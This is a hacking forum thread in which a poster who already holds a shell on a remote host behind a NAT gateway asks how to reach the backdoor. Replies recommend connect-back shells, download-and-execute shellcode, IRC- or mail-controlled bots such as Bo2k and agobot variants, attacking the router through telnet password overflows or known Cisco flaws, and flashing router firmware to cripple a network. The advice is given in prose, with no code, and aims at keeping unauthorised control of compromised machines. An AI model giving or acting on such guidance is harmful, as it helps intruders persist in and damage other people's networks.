Case connectback



Case bindshell



When u look @ IP u see that the shell connects to the net thrue a gateway. U see only
INTERNAL ip adresses wich means the node is not physicly connected to the inet.

So now my question: If u have a backdoor running on the remote box how can u connect to it ? (When u dont have access to the gateway). Fport is no use.
Anybody want to share the solution ?

THX

(I already have a another topic running on it but i opened a second one cause i didnt explained well what i wanted to ask).

If you can't gain access to the router, i would RTFM. Sometimes by default some incoming connections multi-casted to all computers on the network. Battlenet, xbox live, aim to name a few common ones. Other than that you could try using a download exec shell code or in-line egg depends on what you are doing. One of my buddies made some win32 shell code to connect to the router and set its self as dmz host, written in C. He used the GDI+ exploit because it had 2k of elbow room, the down side is you have to know what router they have. I suggest using a backdoor that connects to a chat network. There are a large number of backdoors like this, i suggest Bo2k. Its open source and many of the agobot variants have backdoors in them .

peace

hi, i was looking at fpipe.exe - would this possibly help in this kind of situation? can anyone elaborate on their experiences with fpipe?
thanks
hodexut

you have 3 solutions.
Depend of the configuration of the gateway.

First Case : the gateway redirect all traffic on the internal computer and it s great for you.

Second Case : you had the shell thank to a hacked routed service and to control all traffic you have to hack the gateway to set up the traffic, but it's not easy to do it.

The last, as said AgentOrange you can install an ircbot who allow you to execute commands from irc.

good luck

Ok thx guys !

Your replies confirmed that my view on the problem was correct.

Good feedback.

Find out what router they use and just try the basic stuff on it, if its a cisco one, they are vunerable to a few things so try that

Or make it connect back to you using a connect back shell so that it bypasses the gateway, and nat that way.

Buz

just try hacking the main computer that can access the gateway, depending on what kinda gateway it is,
if its a linux gateway, look at some port scans and banner grabs with netcat,
then access the router by the main PC, to do this its always a low numbe ron the network(always static), so just try some ping sweps of the network see what PCs are on, what PC's are sending back low packets and fast packets, try find the gateways access PC by a 2000 - 3000 ms ping, its always the one that has a lot of bandwidth going to it, and access that, then telnet to the gateway and buffer the password, by finding a way to over flow it, just try random bytes from 1 4 8 16 - so on.... use a ryhem like a - aaaa - aaaabbbb - aaaabbbbccccdddd and so on. im sure u know the next numbers if not u shouldnt be on a PC.

anywaygood luck.

P.S - i know this wouldnt have helped you, but this is a way of finding access if the gateway denies access from inside and outside network IPs that can access the telnet or ftp and so on, use tftp to upload a flash bug and flash there rom u will criple there network (dont do it for god sakes)

well there is another way closed to Pro21 3rd solution
You can install a backdoor and command it via mail !
you can bypass almost anything with such a proggy as I do

don't forget that even if you can't access the router from outside by telnet and so on ,you can gain a lot of info on it by snmp usually even from outside ..

Whell indeed like everything i do from the shell works fine. Like outbound is no problem.
But inbound is *****-up. A dos mailer works indeed fine.

Thx all for the feedback.